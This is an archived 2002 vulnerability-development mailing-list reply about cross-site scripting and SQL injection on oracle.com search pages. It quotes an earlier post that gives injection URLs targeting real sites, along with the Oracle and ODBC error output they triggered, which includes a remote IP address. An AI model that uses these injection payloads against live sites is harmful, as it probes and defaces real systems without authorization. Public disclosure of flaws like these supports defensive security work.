Vulnerability Development mailing list archives
Re: Oracle Databases Allow HTML/SQL injection
From: KF <dotslash () snosoft com>
Date: Tue, 16 Apr 2002 12:33:25 -0400
I have also found that several of the oracle.com pages allow for cross site scripting... the search pages in particular... if I can find the links archived in my email folder I will forward them on...
-KF david evlis reign wrote:
# oracle database madness" "I only have a few things to say." - davidr css in the oracle search engine -->http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=css<br><br><br><br><font%20color%20=%20red><h1>DAVID%20REIGN%20IN%20THE%20Y2K+2</H1></b><br><br><br><br><br><br>&p_origin=www&p_person_id=100582&p_community=oracle.com_v2&p_doc_location_array=Place+Holder&p_doc_location_array=document&p_location_array=&p_keyword_array=100017&p_value_array=www.oracle.com&p_date_begin=q_date&p_date_end=q_date&p_max_return=200i get fucked up error messages from this:Error generating ctx scoreORA-20000: interMedia Text error: DRG-10800: query failed: DRG-50921: EQUIV operand not a word or another EQUIV expressionand now, the oracle db, while my hacking was targetted at sql injection i found this:Error Diagnostic Information ODBC Error Code = S1000 (General error)[INTERSOLV][ODBC Oracle driver][Oracle]ORA-01756: quoted string not properly terminatedThe error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (245:5) to (245:130).Date/Time: Tue Apr 16 17:37:17 2002 Browser: Mozilla/4.0 (compatible; MSIE 5.01; Windows 3.1) Remote Address: 64.66.85.22 Template: /content/www/prodn/bigpond/direct/view.cfm Query String: ID='54 <-- HAHAH with the url: http://dsleerf.net/direct/view.cfm?ID='54 now, why i am laughing:http://dsleerf.net/bigpond/direct/view.cfm?ID='54";><br><br><br><br><br><br><br><br><br><font%20color%20=%20red><h1>DAVID%20REIGN%20IN%20THE%20Y2K+2</H1></b><br><br><br><br><br><br>the oracle database is shit. anyone who uses oracle is shit. long live apple. -davidr _________________________________________________________________Join the world's largest e-mail service with MSN Hotmail. http://www.hotmail.com
Current thread:
- Oracle Databases Allow HTML/SQL injection david evlis reign (Apr 16)
- Re: Oracle Databases Allow HTML/SQL injection KF (Apr 16)
- Re: Oracle Databases Allow HTML/SQL injection KF (Apr 16)
- Re: Oracle Databases Allow HTML/SQL injection Jim Kovalchuk (Apr 16)